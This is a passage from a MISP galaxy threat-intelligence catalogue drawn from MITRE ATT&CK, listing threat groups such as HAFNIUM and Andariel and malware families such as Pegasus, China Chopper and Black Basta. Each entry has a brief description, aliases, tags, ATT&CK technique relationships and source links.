The [Windigo](https://attack.mitre.org/groups/G0124) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://attack.mitre.org/software/S0377) SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, [Windigo](https://attack.mitre.org/groups/G0124) operators continued updating [Ebury](https://attack.mitre.org/software/S0377) through 2019.(Citation: ESET Windigo Mar 2014)(Citation: CERN Windigo June 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Windigo - G0124"

Windigo - G0124 is also known as:

  • Windigo

Table 7149. Table References

Links

https://attack.mitre.org/groups/G0124

https://security.web.cern.ch/advisories/windigo/windigo.shtml

https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/

HAFNIUM - G0125

[HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)

The tag is: misp-galaxy:mitre-intrusion-set="HAFNIUM - G0125"

HAFNIUM - G0125 is also known as:

  • HAFNIUM

  • Operation Exchange Marauder

Table 7150. Table References

Links

https://attack.mitre.org/groups/G0125

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

Higaisa - G0126

[Higaisa](https://attack.mitre.org/groups/G0126) is a threat group suspected to have South Korean origins. [Higaisa](https://attack.mitre.org/groups/G0126) has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. [Higaisa](https://attack.mitre.org/groups/G0126) was first disclosed in early 2019 but is assessed to have operated as early as 2009.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Higaisa - G0126"

Higaisa - G0126 is also known as:

  • Higaisa

Table 7151. Table References

Links

https://attack.mitre.org/groups/G0126

https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/

https://www.zscaler.com/blogs/security-research/return-higaisa-apt

ZIRCONIUM - G0128

[ZIRCONIUM](https://attack.mitre.org/groups/G0128) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.(Citation: Microsoft Targeting Elections September 2020)(Citation: Check Point APT31 February 2021)

The tag is: misp-galaxy:mitre-intrusion-set="ZIRCONIUM - G0128"

ZIRCONIUM - G0128 is also known as:

  • ZIRCONIUM

  • APT31

Table 7152. Table References

Links

https://attack.mitre.org/groups/G0128

https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/

https://research.checkpoint.com/2021/the-story-of-jian/

BackdoorDiplomacy - G0135

[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) is a cyber espionage threat group that has been active since at least 2017. [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.(Citation: ESET BackdoorDiplomacy Jun 2021)

The tag is: misp-galaxy:mitre-intrusion-set="BackdoorDiplomacy - G0135"

BackdoorDiplomacy - G0135 is also known as:

  • BackdoorDiplomacy

Table 7153. Table References

Links

https://attack.mitre.org/groups/G0135

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

IndigoZebra - G0136

[IndigoZebra](https://attack.mitre.org/groups/G0136) is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)

The tag is: misp-galaxy:mitre-intrusion-set="IndigoZebra - G0136"

IndigoZebra - G0136 is also known as:

  • IndigoZebra

Table 7154. Table References

Links

https://attack.mitre.org/groups/G0136

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

https://securelist.com/apt-trends-report-q2-2017/79332/

https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html

Andariel - G0138

[Andariel](https://attack.mitre.org/groups/G0138) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://attack.mitre.org/groups/G0138) has primarily focused its operations—​which have included destructive attacks—​against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://attack.mitre.org/groups/G0138)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.(Citation: FSI Andariel Campaign Rifle July 2017)(Citation: IssueMakersLab Andariel GoldenAxe May 2017)(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: TrendMicro New Andariel Tactics July 2018)(Citation: CrowdStrike Silent Chollima Adversary September 2021)

[Andariel](https://attack.mitre.org/groups/G0138) is considered a sub-set of [Lazarus Group](https://attack.mitre.org/groups/G0032), and has been attributed to North Korea’s Reconnaissance General Bureau.(Citation: Treasury North Korean Cyber Groups September 2019)

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:mitre-intrusion-set="Andariel - G0138"

Andariel - G0138 is also known as:

  • Andariel

  • Silent Chollima

Table 7155. Table References

Links

http://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf

http://www.issuemakerslab.com/research3/

https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/

https://attack.mitre.org/groups/G0138

https://home.treasury.gov/news/press-releases/sm774

https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do

https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html

TeamTNT - G0139

[TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.(Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021)

The tag is: misp-galaxy:mitre-intrusion-set="TeamTNT - G0139"

TeamTNT - G0139 is also known as:

  • TeamTNT

Table 7156. Table References

Links

https://attack.mitre.org/groups/G0139

https://blog.aquasec.com/container-security-tnt-container-attack

https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera

https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf

https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/

https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/

https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf

https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/

Malware

Name of ATT&CK software.

Malware is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Hacking Team UEFI Rootkit - S0047

[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. (Citation: TrendMicro Hacking Team UEFI)

The tag is: misp-galaxy:mitre-malware="Hacking Team UEFI Rootkit - S0047"

Hacking Team UEFI Rootkit - S0047 is also known as:

  • Hacking Team UEFI Rootkit

Hacking Team UEFI Rootkit - S0047 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 7157. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/

https://attack.mitre.org/software/S0047

X-Agent for Android - S0314

[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [CHOPSTICK](https://attack.mitre.org/software/S0023).

The tag is: misp-galaxy:mitre-malware="X-Agent for Android - S0314"

X-Agent for Android - S0314 has relationships with:

  • similar: misp-galaxy:tool="CHOPSTICK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="X-Agent (Android)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="X-Agent" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="CHOPSTICK - S0023" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

Table 7158. Table References

Links

https://attack.mitre.org/software/S0314

https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf

Red Alert 2.0 - S0539

[Red Alert 2.0](https://attack.mitre.org/software/S0539) is a banking trojan that masquerades as a VPN client.(Citation: Sophos Red Alert 2.0)

The tag is: misp-galaxy:mitre-malware="Red Alert 2.0 - S0539"

Red Alert 2.0 - S0539 is also known as:

  • Red Alert 2.0

Table 7159. Table References

Links

https://attack.mitre.org/software/S0539

https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/

Exaramel for Linux - S0401

[Exaramel for Linux](https://attack.mitre.org/software/S0401) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://attack.mitre.org/software/S0343).(Citation: ESET TeleBots Oct 2018)

The tag is: misp-galaxy:mitre-malware="Exaramel for Linux - S0401"

Exaramel for Linux - S0401 is also known as:

  • Exaramel for Linux

Table 7160. Table References

Links

https://attack.mitre.org/software/S0401

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

Winnti for Linux - S0430

[Winnti for Linux](https://attack.mitre.org/software/S0430) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including [Winnti Group](https://attack.mitre.org/groups/G0044). The Windows variant is tracked separately under [Winnti for Windows](https://attack.mitre.org/software/S0141).(Citation: Chronicle Winnti for Linux May 2019)

The tag is: misp-galaxy:mitre-malware="Winnti for Linux - S0430"

Winnti for Linux - S0430 is also known as:

  • Winnti for Linux

Table 7161. Table References

Links

https://attack.mitre.org/software/S0430

https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a

XLoader for iOS - S0490

[XLoader for iOS](https://attack.mitre.org/software/S0490) is a malicious iOS application that is capable of gathering system information.(Citation: TrendMicro-XLoader-FakeSpy) It is tracked separately from the [XLoader for Android](https://attack.mitre.org/software/S0318).

The tag is: misp-galaxy:mitre-malware="XLoader for iOS - S0490"

XLoader for iOS - S0490 is also known as:

  • XLoader for iOS

Table 7162. Table References

Links

https://attack.mitre.org/software/S0490

https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/

Winnti for Windows - S0141

[Winnti for Windows](https://attack.mitre.org/software/S0141) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: Kaspersky Winnti April 2013)(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)(Citation: 401 TRG Winnti Umbrella May 2018). The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)

The tag is: misp-galaxy:mitre-malware="Winnti for Windows - S0141"

Winnti for Windows - S0141 is also known as:

  • Winnti for Windows

Winnti for Windows - S0141 has relationships with:

  • similar: misp-galaxy:malpedia="Winnti (Windows)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Winnti" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 7163. Table References

Links

https://401trg.github.io/pages/burning-umbrella.html

https://attack.mitre.org/software/S0141

https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/

https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a

https://securelist.com/winnti-more-than-just-a-game/37029/

https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf

Pegasus for Android - S0316

[Pegasus for Android](https://attack.mitre.org/software/S0316) is the Android version of malware that has reportedly been linked to the NSO Group. (Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor) The iOS version is tracked separately under [Pegasus for iOS](https://attack.mitre.org/software/S0289).

The tag is: misp-galaxy:mitre-malware="Pegasus for Android - S0316"

Pegasus for Android - S0316 is also known as:

  • Pegasus for Android

  • Chrysaor

Pegasus for Android - S0316 has relationships with:

  • similar: misp-galaxy:malpedia="Chrysaor" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Chrysaor" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 7164. Table References

Links

https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html

https://attack.mitre.org/software/S0316

https://blog.lookout.com/blog/2017/04/03/pegasus-android/

XLoader for Android - S0318

[XLoader for Android](https://attack.mitre.org/software/S0318) is a malicious Android app first observed targeting Japan, Korea, China, Taiwan, and Hong Kong in 2018. It has more recently been observed targeting South Korean users as a pornography application.(Citation: TrendMicro-XLoader-FakeSpy)(Citation: TrendMicro-XLoader) It is tracked separately from the [XLoader for iOS](https://attack.mitre.org/software/S0490).

The tag is: misp-galaxy:mitre-malware="XLoader for Android - S0318"

XLoader for Android - S0318 is also known as:

  • XLoader for Android

Table 7165. Table References

Links

https://attack.mitre.org/software/S0318

https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/

https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/

Pegasus for iOS - S0289

[Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims. (Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).

The tag is: misp-galaxy:mitre-malware="Pegasus for iOS - S0289"

Pegasus for iOS - S0289 is also known as:

  • Pegasus for iOS

Pegasus for iOS - S0289 has relationships with:

  • similar: misp-galaxy:malpedia="Chrysaor" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Chrysaor" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1404" with estimative-language:likelihood-probability="almost-certain"

Table 7166. Table References

Links

https://attack.mitre.org/software/S0289

https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf

Exaramel for Windows - S0343

[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)

The tag is: misp-galaxy:mitre-malware="Exaramel for Windows - S0343"

Exaramel for Windows - S0343 is also known as:

  • Exaramel for Windows

Table 7167. Table References

Links

https://attack.mitre.org/software/S0343

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

P.A.S. Webshell - S0598

[P.A.S. Webshell](https://attack.mitre.org/software/S0598) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)

The tag is: misp-galaxy:mitre-malware="P.A.S. Webshell - S0598"

P.A.S. Webshell - S0598 is also known as:

  • P.A.S. Webshell

  • Fobushell

Table 7168. Table References

Links

https://attack.mitre.org/software/S0598

https://us-cert.cisa.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf

gh0st RAT - S0032

[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.(Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)

The tag is: misp-galaxy:mitre-malware="gh0st RAT - S0032"

gh0st RAT - S0032 is also known as:

  • gh0st RAT

  • Mydoor

  • Moudoor

gh0st RAT - S0032 has relationships with:

  • similar: misp-galaxy:tool="gh0st" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7169. Table References

Links

https://attack.mitre.org/software/S0032

https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/

https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html

China Chopper - S0020

[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.(Citation: Lee 2013) It has been used by several threat groups.(Citation: Dell TG-3390)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Rapid7 HAFNIUM Mar 2021)

The tag is: misp-galaxy:mitre-malware="China Chopper - S0020"

China Chopper - S0020 is also known as:

  • China Chopper

China Chopper - S0020 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1100" with estimative-language:likelihood-probability="almost-certain"

Table 7170. Table References

Links

https://attack.mitre.org/software/S0020

https://us-cert.cisa.gov/ncas/alerts/aa21-200a

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

Skeleton Key - S0007

[Skeleton Key](https://attack.mitre.org/software/S0007) is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. (Citation: Dell Skeleton) Functionality similar to [Skeleton Key](https://attack.mitre.org/software/S0007) is included as a module in [Mimikatz](https://attack.mitre.org/software/S0002).

The tag is: misp-galaxy:mitre-malware="Skeleton Key - S0007"

Skeleton Key - S0007 is also known as:

  • Skeleton Key

Skeleton Key - S0007 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 7171. Table References

Links

https://attack.mitre.org/software/S0007

https://www.secureworks.com/research/skeleton-key-malware-analysis

P2P ZeuS - S0016

[P2P ZeuS](https://attack.mitre.org/software/S0016) is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. (Citation: Dell P2P ZeuS)

The tag is: misp-galaxy:mitre-malware="P2P ZeuS - S0016"

P2P ZeuS - S0016 is also known as:

  • P2P ZeuS

  • Peer-to-Peer ZeuS

  • Gameover ZeuS

P2P ZeuS - S0016 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"

Table 7172. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ZeuS/

https://attack.mitre.org/software/S0016

Unknown Logger - S0130

[Unknown Logger](https://attack.mitre.org/software/S0130) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. (Citation: Forcepoint Monsoon)

The tag is: misp-galaxy:mitre-malware="Unknown Logger - S0130"

Unknown Logger - S0130 is also known as:

  • Unknown Logger

Unknown Logger - S0130 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089" with estimative-language:likelihood-probability="almost-certain"

Table 7173. Table References

Links

https://attack.mitre.org/software/S0130

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

Black Basta - S1070

[Black Basta](https://attack.mitre.org/software/S1070) is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMWare ESXi servers. [Black Basta](https://attack.mitre.org/software/S1070) operations have included the double extortion technique where in addition to demanding ransom for decrypting the files of targeted organizations the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. [Black Basta](https://attack.mitre.org/software/S1070) affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the [Black Basta](https://attack.mitre.org/software/S1070) RaaS operators could include current or former members of the [Conti](https://attack.mitre.org/software/S0575) group.(Citation: Palo Alto Networks Black Basta August 2022)(Citation: Deep Instinct Black Basta August 2022)(Citation: Minerva Labs Black Basta May 2022)(Citation: Avertium Black Basta June 2022)(Citation: NCC Group Black Basta June 2022)(Citation: Cyble Black Basta May 2022)

The tag is: misp-galaxy:mitre-malware="Black Basta - S1070"

Black Basta - S1070 is also known as:

  • Black Basta

Table 7174. Table References

Links

https://attack.mitre.org/software/S1070

https://blog.cyble.com/2022/05/06/black-basta-ransomware/

https://minerva-labs.com/blog/new-black-basta-ransomware-hijacks-windows-fax-service/

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware

https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware

https://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence

Cherry Picker - S0107

[Cherry Picker](https://attack.mitre.org/software/S0107) is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)

The tag is: misp-galaxy:mitre-malware="Cherry Picker - S0107"

Cherry Picker - S0107 is also known as:

  • Cherry Picker

Cherry Picker - S0107 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103" with estimative-language:likelihood-probability="almost-certain"

Table 7175. Table References

Links

https://attack.mitre.org/software/S0107

https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/

Zeus Panda - S0330

[Zeus Panda](https://attack.mitre.org/software/S0330) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://attack.mitre.org/software/S0330)’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)

The tag is: misp-galaxy:mitre-malware="Zeus Panda - S0330"

Zeus Panda - S0330 is also known as:

  • Zeus Panda

Table 7176. Table References

Links

https://attack.mitre.org/software/S0330

https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html#More

https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf

SpyNote RAT - S0305

[SpyNote RAT](https://attack.mitre.org/software/S0305) (Remote Access Trojan) is a family of malicious Android apps. The [SpyNote RAT](https://attack.mitre.org/software/S0305) builder tool can be used to develop malicious apps with the malware’s functionality. (Citation: Zscaler-SpyNote)

The tag is: misp-galaxy:mitre-malware="SpyNote RAT - S0305"

SpyNote RAT - S0305 is also known as:

  • SpyNote RAT

SpyNote RAT - S0305 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

Table 7177. Table References

Links

https://attack.mitre.org/software/S0305

https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app

3PARA RAT - S0066

[3PARA RAT](https://attack.mitre.org/software/S0066) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024). (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-malware="3PARA RAT - S0066"

3PARA RAT - S0066 is also known as:

  • 3PARA RAT

3PARA RAT - S0066 has relationships with:

  • similar: misp-galaxy:rat="3PARA RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7178. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/software/S0066

Agent Smith - S0440

[Agent Smith](https://attack.mitre.org/software/S0440) is mobile malware that generates financial gain by replacing legitimate applications on devices with malicious versions that include fraudulent ads. As of July 2019 [Agent Smith](https://attack.mitre.org/software/S0440) had infected around 25 million devices, primarily targeting India though effects had been observed in other Asian countries as well as Saudi Arabia, the United Kingdom, and the United States.(Citation: CheckPoint Agent Smith)

The tag is: misp-galaxy:mitre-malware="Agent Smith - S0440"

Agent Smith - S0440 is also known as:

  • Agent Smith

Table 7179. Table References

Links

https://attack.mitre.org/software/S0440

https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/

4H RAT - S0065

[4H RAT](https://attack.mitre.org/software/S0065) is malware that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024) since at least 2007. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-malware="4H RAT - S0065"

4H RAT - S0065 is also known as:

  • 4H RAT

4H RAT - S0065 has relationships with:

  • similar: misp-galaxy:rat="4H RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7180. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/software/S0065

Desert Scorpion - S0505

[Desert Scorpion](https://attack.mitre.org/software/S0505) is surveillanceware that has targeted the Middle East, specifically individuals located in Palestine. [Desert Scorpion](https://attack.mitre.org/software/S0505) is suspected to have been operated by the threat actor APT-C-23.(Citation: Lookout Desert Scorpion)

The tag is: misp-galaxy:mitre-malware="Desert Scorpion - S0505"

Desert Scorpion - S0505 is also known as:

  • Desert Scorpion

Table 7181. Table References

Links

https://attack.mitre.org/software/S0505

https://blog.lookout.com/desert-scorpion-google-play

Net Crawler - S0056

[Net Crawler](https://attack.mitre.org/software/S0056) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://attack.mitre.org/software/S0029) to execute a copy of [Net Crawler](https://attack.mitre.org/software/S0056). (Citation: Cylance Cleaver)

The tag is: misp-galaxy:mitre-malware="Net Crawler - S0056"

Net Crawler - S0056 is also known as:

  • Net Crawler

  • NetC

Net Crawler - S0056 has relationships with:

  • similar: misp-galaxy:malpedia="NetC" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"

Table 7182. Table References

Links

https://attack.mitre.org/software/S0056

https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

Bad Rabbit - S0606

[Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware)

The tag is: misp-galaxy:mitre-malware="Bad Rabbit - S0606"

Bad Rabbit - S0606 is also known as:

  • Bad Rabbit

  • Win32/Diskcoder.D

Table 7183. Table References

Links

https://attack.mitre.org/software/S0606

https://securelist.com/bad-rabbit-ransomware/82851/

https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

Green Lambert - S0690

